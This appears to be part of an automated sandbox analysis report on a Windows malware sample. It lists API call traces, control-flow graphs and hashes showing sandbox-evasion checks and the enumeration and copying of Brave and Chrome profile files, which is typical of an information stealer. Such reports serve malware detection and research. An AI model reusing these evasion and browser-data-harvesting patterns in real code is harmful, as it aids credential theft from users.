                                • Opcode Fuzzy Hash: 5e7956642729e4f8b73c8a025370551e44d6396021726c7dcc34e02a264ed51f
                                • Instruction Fuzzy Hash: 8E316FB190924A9FCB04DFB89985AEFBFBDFF58710F10416EE505F7650E6348A408BA1

                                Control-flow Graph
                                [Graph image not reproduced in text. Entry block 6a4bc0; API calls shown in the graph: ??2@YAPAXI@Z (3 times), lstrlen, InternetCrackUrlA; subcall to 6a2a20.]
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 006A4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006A4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006A4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 006A4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 006A4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 83a68320fa4776db539a0a08259706918bbe6f8e327e43987da3082bdcbe4728
                                • Instruction ID: e29d6e4c95a5d8059917b8ff4295ddd03414599f32e9594dfb8679402de620e6
                                • Opcode Fuzzy Hash: 83a68320fa4776db539a0a08259706918bbe6f8e327e43987da3082bdcbe4728
                                • Instruction Fuzzy Hash: 25012D71D01218ABDB10DFA9EC45B9EBBB9EB49320F00416AF954E7390EF7459048FD4

                                Control-flow Graph
                                [Graph image not reproduced in text. Entry block 6a1030; API calls shown in the graph: GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree.]
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006A1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 006A104D
                                • ExitProcess.KERNEL32 ref: 006A1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006A106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006A10AB
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: a7b2313619f091deadb0f364a2297be69b7a06fd97f6dbd0d7fd007056677a3d
                                • Instruction ID: c944ead6afee72a502ee1a58eceedc8bca2de0b0ff26bf8038b5c281968315df
                                • Instruction Fuzzy Hash: 5901F471741204BBEB206B656C1AFAB77ADF796B11F208115F748E73C0DDB1ED008A64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 6bee90-6beeb5 call 6a2930 2808 6beec9-6beecd call 6a6c40 2805->2808 2809 6beeb7-6beebf 2805->2809 2812 6beed2-6beee8 StrCmpCA 2808->2812 2809->2808 2810 6beec1-6beec3 lstrcpy 2809->2810 2810->2808 2813 6beeea-6bef02 call 6a2a20 call 6a2930 2812->2813 2814 6bef11-6bef18 call 6a2a20 2812->2814 2824 6bef45-6befa0 call 6a2a20 * 10 2813->2824 2825 6bef04-6bef0c 2813->2825 2820 6bef20-6bef28 2814->2820 2820->2820 2822 6bef2a-6bef37 call 6a2930 2820->2822 2822->2824 2829 6bef39 2822->2829 2825->2824 2828 6bef0e-6bef0f 2825->2828 2831 6bef3e-6bef3f lstrcpy 2828->2831 2829->2831 2831->2824
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006BEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006BEF3F
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: cadcc5e7b4a3c4e8d8a47de5748ab3f7e76bb7ccacb37aba99f0c210da0fe181
                                • Instruction ID: 3f6b55e217c0e7b7b60228586dbbc7e5fa8da97756210d0fc4e99a1fa8a047a5
                                • Instruction Fuzzy Hash: AA214FB07602069BCB61BF7EDC56AEA77A6AF11300F04446DB94ACB612EA31DC408F94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 6a10c0-6a10cb 2887 6a10d0-6a10dc 2886->2887 2889 6a10de-6a10f3 GlobalMemoryStatusEx 2887->2889 2890 6a1112-6a1114 ExitProcess 2889->2890 2891 6a10f5-6a1106 2889->2891 2892 6a111a-6a111d 2891->2892 2893 6a1108 2891->2893 2893->2890 2894 6a110a-6a1110 2893->2894 2894->2890 2894->2892
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: d8791d8e12ad0215d7a0ab0c6cd68ed2ae5ce44809ca72d19952764623d7626f
                                • Instruction ID: 057426409896dfd78c87accd1f6aa9c56b6b4fd9854ed2ddd904b3be39a3ae49
                                • Instruction Fuzzy Hash: 05F027701082448BEB107A64D80A32EF7DAEB13350F14092DDEDACA280E734CC408937

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 6b8c88-6b8cc4 StrCmpCA 2898 6b8ccd-6b8ce6 2895->2898 2899 6b8cc6-6b8cc7 ExitProcess 2895->2899 2901 6b8cec-6b8cf1 2898->2901 2902 6b8ee2-6b8eef call 6a2a20 2898->2902 2904 6b8cf6-6b8cf9 2901->2904 2905 6b8cff 2904->2905 2906 6b8ec3-6b8edc 2904->2906 2908 6b8e88-6b8e9a lstrlen 2905->2908 2909 6b8e6f-6b8e7d StrCmpCA 2905->2909 2910 6b8d06-6b8d15 lstrlen 2905->2910 2911 6b8d84-6b8d92 StrCmpCA 2905->2911 2912 6b8da4-6b8db8 StrCmpCA 2905->2912 2913 6b8d5a-6b8d69 lstrlen 2905->2913 2914 6b8dbd-6b8dcb StrCmpCA 2905->2914 2915 6b8ddd-6b8deb StrCmpCA 2905->2915 2916 6b8dfd-6b8e0b StrCmpCA 2905->2916 2917 6b8e1d-6b8e2b StrCmpCA 2905->2917 2918 6b8e3d-6b8e4b StrCmpCA 2905->2918 2919 6b8d30-6b8d3f lstrlen 2905->2919 2920 6b8e56-6b8e64 StrCmpCA 2905->2920 2906->2902 2940 6b8cf3 2906->2940 2934 6b8e9c-6b8ea1 call 6a2a20 2908->2934 2935 6b8ea4-6b8eb0 call 6a2930 2908->2935 2909->2906 2933 6b8e7f-6b8e86 2909->2933 2929 6b8d1f-6b8d2b call 6a2930 2910->2929 2930 6b8d17-6b8d1c call 6a2a20 2910->2930 2911->2906 2924 6b8d98-6b8d9f 2911->2924 2912->2906 2921 6b8d6b-6b8d70 call 6a2a20 2913->2921 2922 6b8d73-6b8d7f call 6a2930 2913->2922 2914->2906 2925 6b8dd1-6b8dd8 2914->2925 2915->2906 2926 6b8df1-6b8df8 2915->2926 2916->2906 2927 6b8e11-6b8e18 2916->2927 2917->2906 2928 6b8e31-6b8e38 2917->2928 2918->2906 2931 6b8e4d-6b8e54 2918->2931 2936 6b8d49-6b8d55 call 6a2930 2919->2936 2937 6b8d41-6b8d46 call 6a2a20 2919->2937 2920->2906 2932 6b8e66-6b8e6d 2920->2932 2921->2922 2955 6b8eb3-6b8eb5 2922->2955 2924->2906 2925->2906 2926->2906 2927->2906 2928->2906 2929->2955 2930->2929 2931->2906 2932->2906 2933->2906 2934->2935 2935->2955 2936->2955 2937->2936 2940->2904 2955->2906 2956 6b8eb7-6b8eb9 2955->2956 2956->2906 2957 6b8ebb-6b8ebd lstrcpy 2956->2957 2957->2906
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 589377fdc6016be49b7db14f922b4b71750e24d105bfd06e0e416559becfb979
                                • Instruction ID: b0dd9e1560f9caaec48c4c2aa9abb1ea7b4785a54a024ba2437ce00d4044da2f
                                • Instruction Fuzzy Hash: 47E0D8A0500349EBDB007FB5DCC49C67B6CFF84710B048529ED455B256EB749D00C764

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2958 6c2ad0-6c2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 6c2b44-6c2b59 2958->2959 2960 6c2b24-6c2b36 2958->2960
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006C2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 006C2B1A
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 58cbfc52cd059cffdd70c32bc8f14e796c2e4c17f4079f824dee9337c0b75bed
                                • Instruction ID: 89b85ab78da7a999d19be1147ae5d19a831725a42245dfbb55519b6718c14312
                                • Instruction Fuzzy Hash: 6701D172A45648ABC710DF99EC45BAEFBB8F744B21F00026BF919E3780D7741D0087A1
                                APIs
                                • VirtualAlloc.KERNEL32(00000000), ref: 008F0FA8
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: d1fe9645521ccc85f1ebad97aa66e2d29f9be09a588b7749bdbc468c249518bf
                                • Instruction ID: 2a198149b50d6a1d7e69391d9016b5c090d27b4c127458a30f6e28ef7787ea04
                                • Instruction Fuzzy Hash: 90D05EF020C70CAFE3546E159C05BBF76E8EB84701F10802CDB4186A82F9700C14C9AA
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B2402
                                • lstrlen.KERNEL32(\*.*), ref: 006B240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006B2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B2486
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 501f89fcaab5f3409c6989803bf07df05dd94d8b1ea11a57f908e41b82bd624b
                                • Instruction ID: 40e5d119917fa0c323daf0a290bd48741464fd51afaf74e739099aa7101178ef
                                • Instruction Fuzzy Hash: F1A28EB1A11617ABCB21AF69DCA8AEE77BABF05700F044169F84997311DB34DD818F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A16E2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A176C
                                • lstrcat.KERNEL32(00000000), ref: 006A1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1875
                                • lstrcat.KERNEL32(00000000), ref: 006A187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A18FE
                                • lstrlen.KERNEL32(006D1794), ref: 006A1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1929
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1966
                                • lstrlen.KERNEL32(\*.*), ref: 006A1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006A199A
                                  • Part of subcall function 006C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 006C406D
                                  • Part of subcall function 006C4040: lstrcpy.KERNEL32(00000000,?), ref: 006C40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1A16
                                • lstrlen.KERNEL32(006D1794), ref: 006A1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1A41
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1A81
                                • lstrlen.KERNEL32(006D1794), ref: 006A1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1AAC
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006A1B45
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006A1B70
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006A1B8A
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1C03
                                • lstrlen.KERNEL32(006D1794), ref: 006A1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1C31
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1C74
                                • lstrlen.KERNEL32(006D1794), ref: 006A1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1CA2
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1CAE
                                • lstrlen.KERNEL32(?), ref: 006A1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1CE9
                                • lstrlen.KERNEL32(006D1794), ref: 006A1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1D14
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1DEB
                                • lstrlen.KERNEL32(006D1794), ref: 006A1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1E19
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1E56
                                • lstrlen.KERNEL32(006D1794), ref: 006A1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1E81
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1E8D
                                • lstrlen.KERNEL32(?), ref: 006A1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006A1F45
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1F9F
                                • lstrlen.KERNEL32(01339358), ref: 006A1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1FE3
                                • lstrlen.KERNEL32(006D1794), ref: 006A1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A200E
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A204D
                                • lstrlen.KERNEL32(006D1794), ref: 006A2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2075
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 0fac0964069c3653757c3c8bb392b85e8079d94d07c0fb1d7ab81e952b20cf5f
                                • Instruction ID: 4d8f38e742a9cbfd88f421797d9455fb42ca7fafddc72650156577163a89fbf0
                                • Opcode Fuzzy Hash: 0fac0964069c3653757c3c8bb392b85e8079d94d07c0fb1d7ab81e952b20cf5f
                                • Instruction Fuzzy Hash: 45926071A416179BCB21BF69DD98AEE77BBBF06700F044169F909AB211DB34DD018FA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADBEF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006ADBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC17
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006ADC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC4C
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADC8F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006ADCD0
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006ADCF0
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006ADD0A
                                • lstrlen.KERNEL32(006CCFEC), ref: 006ADD1D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADD7B
                                • lstrlen.KERNEL32(006D1794), ref: 006ADD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDA3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADDAF
                                • lstrlen.KERNEL32(?), ref: 006ADDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006ADDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADE19
                                • lstrlen.KERNEL32(006D1794), ref: 006ADE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADE6F
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADE7B
                                • lstrlen.KERNEL32(01339218), ref: 006ADE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADEBB
                                • lstrlen.KERNEL32(006D1794), ref: 006ADEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADEE6
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADEF2
                                • lstrlen.KERNEL32(01339398), ref: 006ADF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFA5
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADFB1
                                • lstrlen.KERNEL32(01339218), ref: 006ADFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADFF4
                                • lstrlen.KERNEL32(006D1794), ref: 006ADFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE022
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006AE02E
                                • lstrlen.KERNEL32(01339398), ref: 006AE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006AE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006AE0E7
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE11F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006AE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006AE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE19F
                                • lstrcat.KERNEL32(00000000), ref: 006AE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006AE1F9
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE22F
                                • lstrlen.KERNEL32(01339358), ref: 006AE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE261
                                • lstrcat.KERNEL32(00000000,01339358), ref: 006AE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 006AE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 006AE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE349
                                • DeleteFileA.KERNEL32(?), ref: 006AE381
                                • StrCmpCA.SHLWAPI(?,0133D750), ref: 006AE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE445
                                • StrCmpCA.SHLWAPI(?,01339398), ref: 006AE468
                                • StrCmpCA.SHLWAPI(?,01339218), ref: 006AE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006AE4E0
                                • StrCmpCA.SHLWAPI(?,0133D7B0), ref: 006AE58E
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006AE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 006AE776
                                • DeleteFileA.KERNEL32(?), ref: 006AE7D2
                                • StrCmpCA.SHLWAPI(?,013392B8), ref: 006AE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE952
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: 79cc91ca10b05d5f103e1ee128e4a4f5288ff6945ba87cc1df0e0f6f21705cae
                                • Instruction ID: c0d40fc9bb2fe7fa0e1507e364b2c21b4eb901f85ae9c9e3f4f7c03ae975b6c3
                                • Opcode Fuzzy Hash: 79cc91ca10b05d5f103e1ee128e4a4f5288ff6945ba87cc1df0e0f6f21705cae
                                • Instruction Fuzzy Hash: E192AC71A112169BCB60FF69DC89AAE77BABF46300F04452DF84AA7351DB34DC458F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B18D2
                                • lstrlen.KERNEL32(\*.*), ref: 006B18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006B190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B1947
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B1967
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B1981
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B19BF
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1A4C
                                • lstrlen.KERNEL32(006D1794), ref: 006B1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1A80
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1AB4
                                • lstrlen.KERNEL32(?), ref: 006B1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 006B1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1B19
                                • lstrlen.KERNEL32(013393B8), ref: 006B1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1B59
